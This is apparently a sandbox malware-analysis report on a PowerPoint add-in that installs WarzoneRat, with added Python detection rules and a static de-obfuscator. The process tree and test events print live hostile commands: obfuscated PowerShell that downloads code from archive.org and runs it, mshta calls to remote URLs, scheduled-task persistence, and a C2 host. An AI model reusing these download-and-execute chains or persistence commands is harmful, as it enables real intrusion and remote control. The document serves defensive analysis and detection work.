Analysis
max time kernel: 146s
max time network: 154s
platform: windows10_x64
resource: win10v20210410
submitted: 12-07-2021 14:59
Static task: static1
Behavioral task: behavioral1, sample IdDetails.ppam, resource win7v20210408
Behavioral task: behavioral2, sample IdDetails.ppam, resource win10v20210410 (the run shown in this report)
General
Target: IdDetails.ppam
Size: 16KB
MD5: 8fb67950eee24c33116c5c8ae87bbde1
SHA1: 26d8b5eec451ed68f3a61f4f69b4fadffb736d22
SHA256: a524b17edc79f1cacd57f9a07becfd24df6d0ef893d11620cb3c300c86c327ed
SHA512: 1c03f7930d08ad4ea8d7fc0f8527d5db6bc618989e8ab9183abe05309d6b9f75f0eef61271059a576e2709a7d6ec5385f206d48ca99eeda9832148fa1117c9e3
Malware Config
Extracted (stage-1 download URL, the $www variable of the first PowerShell command): https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt
Extracted (family: warzonerat): C2 normanaman.duckdns.org:3009
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro. Here the .ppam (a macro-enabled PowerPoint add-in) opened by PowerPoint led to POWERPNT.EXE spawning mshta.exe, and a second schtasks.exe was started from the WMI provider host.
Processes (description; pid process, parent pid):
  Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process: 1240 mshta.exe (parent 4064 POWERPNT.EXE)
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process: 4572 schtasks.exe (parent 3288, not in the process list)
-
WarzoneRat, AveMaria
WarzoneRat (also tracked as AveMaria) is a native RAT written in C++ with multiple plugins, sold as malware-as-a-service (MaaS). The extracted configuration above gives its C2 as normanaman.duckdns.org:3009.
-
Blocklisted process makes network request 24 IoCs
Processes (pid process: flow ids):
  1240 mshta.exe: flows 19, 21, 23, 25, 27, 29, 30, 32, 34, 35, 38, 40, 41, 45 (14)
  3528 powershell.exe: flows 43, 49, 52, 54, 56, 58, 62 (7)
  3616 powershell.exe: flows 46, 59, 65 (3)
-
Process spawned suspicious child process 1 IoCs
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised. DW20.EXE is the Office error-reporting tool; together with the werfault.exe entry for PID 4064 in the process tree it shows that PowerPoint itself crashed, which does not mean the chain failed: mshta.exe and the PowerShell stages ran regardless.
Processes (description; pid process, parent pid):
  Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process: 2408 DW20.EXE (parent 4064 POWERPNT.EXE)
-
Suspicious use of SetThreadContext 3 IoCs
Processes (pid process -> target pid target process):
  3616 powershell.exe -> 4296 MSBuild.exe
  3616 powershell.exe -> 4420 MSBuild.exe
  3616 powershell.exe -> 4612 aspnet_compiler.exe
Together with the WriteProcessMemory entries below (ten writes into each of these targets), this is the pattern of process hollowing: the second PowerShell stage starts a signed .NET utility, writes the payload into it and redirects its main thread into the injected code.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The "likely ransomware behaviour" hint is the sandbox's generic text for this signature; no encryption or ransom activity is recorded in this report, and the extracted configuration identifies the payload as the WarzoneRat RAT.
-
Program crash 1 IoCs
Processes (pid process -> crashed pid process):
  4112 WerFault.exe -> 1240 mshta.exe
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution. Both tasks here run every 80 minutes (/sc MINUTE /mo 80): "BlueStacks" re-launches mshta.exe against the blogspot URL, so the chain is re-staged from the web even if the dropped files are removed, and "BatFile" runs C:\Users\Public\clone.vbs.
Processes (pid process):
  3484 schtasks.exe
  4572 schtasks.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes (pid process):
  4064 POWERPNT.EXE
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes (pid process, count):
  4064 POWERPNT.EXE (2)
  3528 powershell.exe (3)
  3616 powershell.exe (3)
  4112 WerFault.exe (16)
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes (token; pid process):
  SeDebugPrivilege: 3528 powershell.exe
  SeDebugPrivilege: 3616 powershell.exe
  SeDebugPrivilege: 4112 WerFault.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes (pid process):
  4064 POWERPNT.EXE
-
Suspicious use of WriteProcessMemory 40 IoCs
Processes (pid process -> target pid target process, count):
  4064 POWERPNT.EXE -> 1240 mshta.exe (2)
  1240 mshta.exe -> 3528 powershell.exe (2)
  1240 mshta.exe -> 3484 schtasks.exe (2)
  1240 mshta.exe -> 3616 powershell.exe (2)
  3616 powershell.exe -> 4296 MSBuild.exe (10)
  3616 powershell.exe -> 4420 MSBuild.exe (10)
  3528 powershell.exe -> 4496 WScript.exe (2)
  3616 powershell.exe -> 4612 aspnet_compiler.exe (10)
The two-write entries match ordinary child-process creation; the ten-write runs from powershell.exe (PID 3616) into the three .NET processes are the payload being written into the hollowed hosts.
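The process-level signatures above (unexpected parent, LOLBin with a URL on its command line, script host spawning a .NET build tool, obfuscated PowerShell, schtasks with a script action) written as detection logic over process-creation events, as an added example that is not the sandbox's own signature engine. The events are constructed from the report's process tree using Sysmon Event ID 1 field names; the explorer.exe parent of POWERPNT.EXE, the normal-quote rendering of the schtasks /tr arguments, the abridged PowerShell command lines and the two benign control events (PIDs 5001 and 5002) are assumptions, not taken from the report. The `url_in_lolbin_cmdline` rule is a static stand-in for "Blocklisted process makes network request", which the sandbox records from actual traffic.

```python
"""Detection rules for the process-level signatures in the report, run over
constructed Sysmon-style process-creation events (added example, not the
sandbox's engine; parents/command lines copied from the process tree, the
explorer.exe parent and the two benign events are assumptions)."""
import re
from pathlib import PureWindowsPath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
UNEXPECTED_PARENTS = OFFICE_APPS | {"wmiprvse.exe"}   # the two "not expected to spawn" parents in the report
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
LOLBINS = SCRIPT_HOSTS | {"cmd.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "schtasks.exe"}
# .NET utilities commonly used as hollowing hosts; MSBuild and aspnet_compiler are the ones in the report
INJECTION_TARGETS = {"msbuild.exe", "aspnet_compiler.exe", "regasm.exe", "regsvcs.exe", "installutil.exe"}

URL_RE = re.compile(r"https?://", re.I)
SCHTASKS_TR_RE = re.compile(r'/tr\s+("(?:[^"]|"")*"|\S+)', re.I)          # the task's action argument
SCRIPT_ACTION_RE = re.compile(r"mshta|wscript|cscript|powershell|\.vbs\b|\.js\b|\.hta\b|https?://", re.I)
USER_WRITABLE_SCRIPT_RE = re.compile(
    r"[A-Za-z]:\\Users\\(?:Public|[^\\]+\\AppData)\\[^\"']*?\.(?:vbs|js|hta|ps1)\b", re.I)


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def evaluate(event: dict) -> list:
    """Return the names of every rule the event matches, in a fixed order."""
    image, parent, cmd = _basename(event["Image"]), _basename(event["ParentImage"]), event["CommandLine"]
    hits = []
    if parent in UNEXPECTED_PARENTS and image in LOLBINS:
        hits.append("unexpected_parent")
    if image in LOLBINS and URL_RE.search(cmd):
        hits.append("url_in_lolbin_cmdline")
    if parent in SCRIPT_HOSTS and image in INJECTION_TARGETS:
        hits.append("script_host_spawns_injection_target")
    if image in {"powershell.exe", "pwsh.exe"} and ("`" in cmd or cmd.count(".Replace(") >= 2):
        hits.append("obfuscated_powershell")          # backtick escapes (I`E`X) or stacked .Replace() chains
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        action = SCHTASKS_TR_RE.search(cmd)
        if action and SCRIPT_ACTION_RE.search(action.group(1)):
            hits.append("schtasks_script_action")
    if image in {"wscript.exe", "cscript.exe", "mshta.exe"} and USER_WRITABLE_SCRIPT_RE.search(cmd):
        hits.append("script_from_user_writable_path")
    return hits


def run_rules(events: list) -> dict:
    """Map each ProcessId to the list of rules it triggered."""
    return {e["ProcessId"]: evaluate(e) for e in events}


POWERPNT = r"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"
MSHTA = r"C:\Windows\SYSTEM32\mshta.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\System32\schtasks.exe"


def _ev(pid, image, parent, cmd):
    return {"ProcessId": pid, "Image": image, "ParentImage": parent, "CommandLine": cmd}


EVENTS = [  # constructed from the report's process tree
    _ev(4064, POWERPNT, r"C:\Windows\explorer.exe",              # parent assumed, not in the report
        f'"{POWERPNT}" "C:\\Users\\Admin\\AppData\\Local\\Temp\\IdDetails.ppam" /ou ""'),
    _ev(1240, MSHTA, POWERPNT, "mshta http://www.bitly.com/ashjdkqowdhqowdh"),
    _ev(3528, PS, MSHTA,                                          # stage-1 one-liner, abridged
        "$www='https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt';"
        "$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');"
        "$hbar=I`E`X ($sss,$aaa,$bbb-Join '')|I`E`X;"),
    _ev(4496, r"C:\Windows\System32\WScript.exe", PS,
        r'"C:\Windows\System32\WScript.exe" "C:\Users\Public\lub.vbs"'),
    _ev(3484, SCHTASKS, MSHTA,                                    # quotes normalised
        f'"{SCHTASKS}" /create /sc MINUTE /mo 80 /tn "BlueStacks" /F '
        '/tr "MsHtA http://1230948%1230948@backishbackuponback.blogspot.com/p/clientsced.html"'),
    _ev(3616, PS, MSHTA,                                          # stage-2 loader, abridged
        "-w h I`E`X([System.IO.StreamReader]::new([System.Net.WebRequest]::Create("
        "'https://ia801403.us.archive.org/11/items/3_20210710_20210710/1.txt')"
        ".GetResponse().GetResponseStream()).ReadToend());"),
    _ev(4296, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", PS, "#cmd"),
    _ev(4612, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", PS, "#cmd"),
    _ev(4572, r"C:\Windows\system32\schtasks.exe", r"C:\Windows\system32\wbem\wmiprvse.exe",
        r'schtasks /create /sc MINUTE /mo 80 /tn "BatFile" /F /tr "C:\Users\Public\clone.vbs"'),
    # Benign controls (constructed): an interactive PowerShell and an admin-created backup task.
    _ev(5001, PS, r"C:\Windows\explorer.exe", "powershell.exe -NoProfile Get-ChildItem C:\\Temp"),
    _ev(5002, SCHTASKS, r"C:\Windows\System32\cmd.exe",
        r'schtasks /create /sc DAILY /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"'),
]

if __name__ == "__main__":
    for pid, hits in run_rules(EVENTS).items():
        print(pid, hits or "-")
```

Every malicious process in the tree trips at least one rule and the two benign controls trip none; the injection-target rule is what catches PID 3616 without relying on the SetThreadContext telemetry, which plain process-creation logs do not carry.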
Processes
(indentation = process depth; PIDs taken from the signature tables above; each entry gives the image path, then the command line as recorded)
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE (PID 4064)
  "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\IdDetails.ppam" /ou ""
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\SYSTEM32\mshta.exe (PID 1240)
    mshta http://www.bitly.com/ashjdkqowdhqowdh
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3528)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $www='https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt';$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');$aaa='ecAAAAAAAAAAAm.NBBBBBBBBBBBBBBbC'.Replace('AAAAAAAAAAA','t Syste').Replace('BBBBBBBBBBBBBB','et.We');$bbb='lieCCCCCCCCCCnloaOOOOOOOOOOOOOOOring($www);'.Replace('CCCCCCCCCC','nt).Dow').Replace('OOOOOOOOOOOOOOO','dst');$hbar=I`E`X ($sss,$aaa,$bbb-Join '')|I`E`X;
      (stage 1: the .Replace() chains reassemble (New-Object System.Net.WebClient).Downloadstring($www); the first IEX runs that download and the second executes what Coxes.txt returns, all in memory)
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WScript.exe (PID 4496)
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\lub.vbs"
    C:\Windows\System32\schtasks.exe (PID 3484)
      "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""BlueStacks"" /F /tr ""\""MsHtA""\""http://1230948%1230948@backishbackuponback.blogspot.com/p/clientsced.html\""
      (quotes as rendered by the sandbox; the task runs mshta.exe against the blogspot page every 80 minutes)
      - Creates scheduled task(s)
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3616)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia801403.us.archive.org/11/items/3_20210710_20210710/1.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia801403.us.archive.org/11/items/3_20210710_20210710/2.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601403.us.archive.org/11/items/3_20210710_20210710/3.txt').GetResponse().GetResponseStream()).ReadToend());
      (stage 2: three text files fetched from archive.org with WebRequest, each read into a string and passed to IEX; -w h hides the window)
      - Blocklisted process makes network request
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        #cmd
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        "{path}"
      (the two MSBuild.exe instances are PIDs 4296 and 4420; the report does not say which command line belongs to which)
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (PID 4612)
        #cmd
    C:\Windows\system32\WerFault.exe (PID 4112)
      C:\Windows\system32\WerFault.exe -u -p 1240 -s 2644
      - Program crash
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE (PID 2408)
    "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 3440
    - Process spawned suspicious child process
C:\Windows\system32\werfault.exe
  werfault.exe /h /shared Global\cc6d463293ce4e6a9a851b75e88ea577 /t 3988 /p 4064
C:\Windows\system32\schtasks.exe (PID 4572, parent 3288 wmiprvse.exe)
  schtasks /create /sc MINUTE /mo 80 /tn ""BatFile"" /F /tr ""\""C:\Users\Public\clone.vbs""
  - Process spawned unexpected child process
  - Creates scheduled task(s)
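The stage-1 PowerShell one-liner under mshta.exe (PID 3528) resolved statically, as an added example that is not part of the report. It evaluates the .Replace() chains and the -Join with plain string operations and never executes the command; the regexes are written for this obfuscation style only (single-quoted literals, literal .Replace() arguments, a -Join of variables) and are not a general PowerShell parser. The padding runs are written as `"A" * 11` and so on so that the literal and its .Replace() pattern cannot drift apart when copying.

```python
"""Static de-obfuscation of the stage-1 PowerShell command (PID 3528) from the
process tree: added example, not from the report. Nothing is executed; the
.Replace() chains and the -Join are resolved with str.replace and str.join."""
import re

# Copied from the report's process tree; padding runs written as repetition.
STAGE1 = (
    "$www='https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt';"
    "$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');"
    "$aaa='ec" + "A" * 11 + "m.N" + "B" * 14 + "bC'"
    ".Replace('" + "A" * 11 + "','t Syste').Replace('" + "B" * 14 + "','et.We');"
    "$bbb='lie" + "C" * 10 + "nloa" + "O" * 15 + "ring($www);'"
    ".Replace('" + "C" * 10 + "','nt).Dow').Replace('" + "O" * 15 + "','dst');"
    "$hbar=I`E`X ($sss,$aaa,$bbb-Join '')|I`E`X;"
)

STR = r"'((?:[^']|'')*)'"                  # single-quoted PowerShell literal; '' is an escaped quote
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*" + STR + r"((?:\.Replace\(" + STR + "," + STR + r"\))*)")
REPLACE_RE = re.compile(r"\.Replace\(" + STR + "," + STR + r"\)")
JOIN_RE = re.compile(r"\(((?:\$\w+,?)+)-Join\s*''\)", re.IGNORECASE)
DOUBLE_IEX_RE = re.compile(r"IEX\s*\(.*-Join\s*''\)\s*\|\s*IEX", re.IGNORECASE)


def _unquote(s: str) -> str:
    return s.replace("''", "'")


def resolve_assignments(script: str) -> dict:
    """Evaluate every $name='literal'.Replace(a,b)... statement with str.replace.

    .NET String.Replace(string, string) is an ordinal, case-sensitive replacement,
    which is exactly what Python's str.replace does, so PowerShell is not needed.
    """
    values = {}
    for m in ASSIGN_RE.finditer(script):
        name, value, chain = m.group(1), _unquote(m.group(2)), m.group(3)
        for old, new in REPLACE_RE.findall(chain):
            value = value.replace(_unquote(old), _unquote(new))
        values[name] = value
    return values


def deobfuscate(script: str) -> dict:
    """Return the resolved variables, the joined expression and the URL it fetches."""
    values = resolve_assignments(script)
    text = script.replace("`", "")          # I`E`X is IEX with escape characters inserted
    join = JOIN_RE.search(text)
    expression = ""
    if join:
        names = [n[1:] for n in join.group(1).split(",") if n]
        expression = "".join(values[n] for n in names)
    for name, value in values.items():      # inline the remaining variables ($www) as literals
        expression = expression.replace("$" + name, "'" + value + "'")
    return {
        "variables": values,
        "expression": expression,
        "urls": sorted(set(re.findall(r"https?://[^\s'\";]+", " ".join(values.values())))),
        # IEX (expr) | IEX: the first IEX performs the download, the second executes what came back
        "double_iex": bool(DOUBLE_IEX_RE.search(text)),
    }


if __name__ == "__main__":
    result = deobfuscate(STAGE1)
    for name, value in result["variables"].items():
        print(f"${name} = {value!r}")
    print("stage-1 expression:", result["expression"])
    print("download URLs:", result["urls"], "| executes downloaded text:", result["double_iex"])
```

The resolved expression reads `(New-Object System.Net.WebClient).Downloadstring('https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt');` with a lowercase "s" from the `'dst'` replacement; PowerShell method names are case-insensitive, so that still runs, and the URL is the same one the sandbox lists under Malware Config. The same approach (resolve literals, then look for the IEX that consumes them) is the first step for Coxes.txt and the three stage-2 files, which the report did not capture.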
Downloads
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5: ba0c69ceb0908b193521106967959098
  SHA1: 44ca77c41d4ab2c17df1c831c41900e4f692f8de
  SHA256: 71f2c3e06e74aa830de694c5a96927e37919c322b8e2ace896a87cbf44b32f55
  SHA512: cf70230fe5dc40ff2b4d03dd9dedd7444f70430e35da55627ec8963244f47dce150e371b5015e508fed11b02a8e84cad240cd6d251dac2df3037ce149d03ca97
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 24c98423fe34f9dde04993e00d3863d1
  SHA1: 866c0e8d72e8d2251adae71db874cae05d2bf721
  SHA256: 2e264c09fbd11a8f304c5c4730dc293d7fd3c95fbca0aa545362ddfb887c56e6
  SHA512: eb627c291a374e7f6606b30e089cef9713676c91e0c47f4d460c33f7ec5b70749dc0a1da9a70d93eec2e14f717e7954236a70e7407cf82d0167b7c100013cf14
C:\Users\Public\lub.vbs (run by WScript.exe PID 4496, a child of powershell.exe PID 3528)
  MD5: 1edd4ddfe49d879dd3c977804a05b9bd
  SHA1: 17157ecc88f381e568f36b9263044450e9dfccbe
  SHA256: d8a10361792b7d54e4084a5a9736e3c8e47e805be894b9a7965e48793f591efa
  SHA512: 6a75daef70bb16da4f33f33fe8e7263b35e327205c2c0f0cc1e44445c8103021ff200830698013f9ad8b3179127ae45a9260b8d10a2bc147417dc378d3a6d0df
Memory dumps (pid-sequence-range; mapping.dmp entries record a mapped address only):
  memory/1240-178-0x0000000000000000-mapping.dmp
  memory/3484-188-0x0000000000000000-mapping.dmp
  memory/3528-187-0x0000000000000000-mapping.dmp
  memory/3528-198-0x0000020FB00D0000-0x0000020FB00D1000-memory.dmp (4KB)
  memory/3528-201-0x0000020FB0280000-0x0000020FB0281000-memory.dmp (4KB)
  memory/3528-210-0x0000020F97A80000-0x0000020F97A82000-memory.dmp (8KB)
  memory/3528-214-0x0000020F97A83000-0x0000020F97A85000-memory.dmp (8KB)
  memory/3528-218-0x0000020F97A86000-0x0000020F97A88000-memory.dmp (8KB)
  memory/3616-190-0x0000000000000000-mapping.dmp
  memory/3616-215-0x0000029E30730000-0x0000029E30732000-memory.dmp (8KB)
  memory/3616-217-0x0000029E30733000-0x0000029E30735000-memory.dmp (8KB)
  memory/3616-219-0x0000029E30736000-0x0000029E30738000-memory.dmp (8KB)
  memory/3616-224-0x0000029E308B0000-0x0000029E308BB000-memory.dmp (44KB)
  memory/3616-230-0x0000029E308D0000-0x0000029E308D3000-memory.dmp (12KB)
  memory/3616-239-0x0000029E48B00000-0x0000029E48B20000-memory.dmp (128KB)
  memory/3616-252-0x0000029E308E0000-0x0000029E308E1000-memory.dmp (4KB)
  memory/4064-114-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp (64KB)
  memory/4064-115-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp (64KB)
  memory/4064-116-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp (64KB)
  memory/4064-117-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp (64KB)
  memory/4064-118-0x00007FFDC5330000-0x00007FFDC6F0D000-memory.dmp (27.9MB)
  memory/4064-119-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp (64KB)
  memory/4064-122-0x00007FFDC1500000-0x00007FFDC25EE000-memory.dmp (16.9MB)
  memory/4064-123-0x00007FFDBD1B0000-0x00007FFDBF0A5000-memory.dmp (31.0MB)
  memory/4296-225-0x0000000000400000-0x000000000055E000-memory.dmp (1.4MB)
  memory/4296-226-0x0000000000405E28-mapping.dmp
  memory/4296-229-0x0000000000400000-0x000000000055E000-memory.dmp (1.4MB)
  memory/4420-232-0x0000000000405E28-mapping.dmp
  memory/4496-237-0x0000000000000000-mapping.dmp
  memory/4612-246-0x0000000000405E28-mapping.dmp
The 1.4MB region at 0x400000-0x55E000 inside MSBuild.exe (PID 4296), and the identical address 0x405E28 mapped in all three injected processes (4296, 4420, 4612), point to the same payload image being written into each hollowed host; the 4296-225 / 4296-229 dumps are the ones to carve for the WarzoneRat binary whose C2 appears under Malware Config.